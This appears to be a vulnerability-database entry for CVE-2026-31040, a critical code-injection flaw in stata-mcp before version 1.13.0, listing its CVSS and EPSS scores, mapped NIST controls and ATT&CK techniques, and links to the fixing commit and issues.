CVE-2026-31040

Critical

Published: 08 April 2026

Published

08 April 2026

Modified

14 April 2026

KEV Added

—

Patch

—

CVSS Score 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS Score 0.0012 31.1th percentile

Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Description

A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution.

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match

prevent

Directly requires validation of user-supplied inputs such as Stata do-file content to prevent code injection and arbitrary command execution.

SI-2 Flaw Remediation good match

prevent

Mandates identification, reporting, and correction of flaws like insufficient do-file validation by patching to v1.13.0 or later.

SI-4 System Monitoring partial match

detect

Monitors systems for attacks and indicators of potential attacks, including anomalous command execution from do-file exploitation.

Security SummaryAI

CVE-2026-31040 is a critical vulnerability in the stata-mcp software prior to version 1.13.0, stemming from insufficient validation of user-supplied Stata do-file content that enables command execution. Published on 2026-04-08, it carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and maps to CWE-94 (Code Injection).

Unauthenticated remote attackers can exploit this vulnerability over the network with low attack complexity and no user interaction required. Successful exploitation grants high-impact confidentiality, integrity, and availability compromises, including arbitrary command execution on affected systems.

Mitigation is available via the stata-mcp GitHub repository, where version 1.13.0 incorporates the fix through commit 52413ce and pull request 21, as detailed in issue 20. Security practitioners should prioritize updating to v1.13.0 or later to address the vulnerability.

Details

CWE(s): CWE-94

Affected Products

statamcp

stata-mcp

≤ 1.13.0

AI Security AnalysisAI

AI Category: AI Agent Protocols and Integrations
Risk Domain: Protocol-Specific Risks
OWASP Top 10 for LLMs 2025: None mapped
MITRE ATLAS Techniques: None mapped
Classification Reason: Matched keywords: mcp

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

attack.mitre.org →

T1059 Command and Scripting Interpreter Execution

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.

attack.mitre.org →

Why these techniques?

Unauthenticated remote code injection vulnerability in public-facing software (stata-mcp) enables exploitation of public-facing applications (T1190) leading to arbitrary command execution (T1059).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

References

https://github.com/SepineTam/stata-mcp/commit/52413ce
Patch · cve@mitre.org
https://github.com/SepineTam/stata-mcp/issues/20
Vendor Advisory, Issue Tracking · cve@mitre.org
https://github.com/SepineTam/stata-mcp/pull/21
Issue Tracking · cve@mitre.org
https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0
Release Notes · cve@mitre.org
https://github.com/SepineTam/stata-mcp/issues/20
Vendor Advisory, Issue Tracking · 134c704f-9b21-4f2e-91b3-4a467353bcc0